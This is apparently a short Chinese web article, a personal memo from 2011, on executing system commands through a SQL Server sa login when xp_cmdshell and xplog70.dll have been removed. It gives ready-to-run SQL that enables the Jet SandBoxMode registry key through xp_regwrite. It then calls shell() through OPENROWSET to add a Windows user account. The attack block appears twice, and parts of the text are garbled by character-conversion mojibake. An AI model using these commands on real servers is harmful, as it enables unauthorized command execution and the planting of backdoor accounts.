SA 沙盤模式下不用恢復xp_cmdshell和xplog70.dll也執(zhí)行命令
更新時間:2011年01月04日 23:53:03 作者:
sa下刪除xp_cmdshell和xplog70.dll時候的一種辦法,不算新的了,
也被一些人不斷的再次提出來,為了方便自己記憶再寫出來,
在這種情況下,要執(zhí)行命令,條件是要有xp_regwrite。
首先開啟沙盤模式:
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
然后利用jet.oledb執(zhí)行系統(tǒng)命令
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net user cnfjhh fst /add")')
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
然后利用jet.oledb執(zhí)行系統(tǒng)命令
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net user cnfjhh fst /add")')
您可能感興趣的文章:
相關文章
Mac下使用mitmproxy抓包HTTPS數(shù)據(jù)方法詳解
在Mac上常用的抓包軟件是 Charles下面為大家介紹另一個抓包神器 mitmproxy,具體使用方法大家可以參考下面的介紹2020-02-02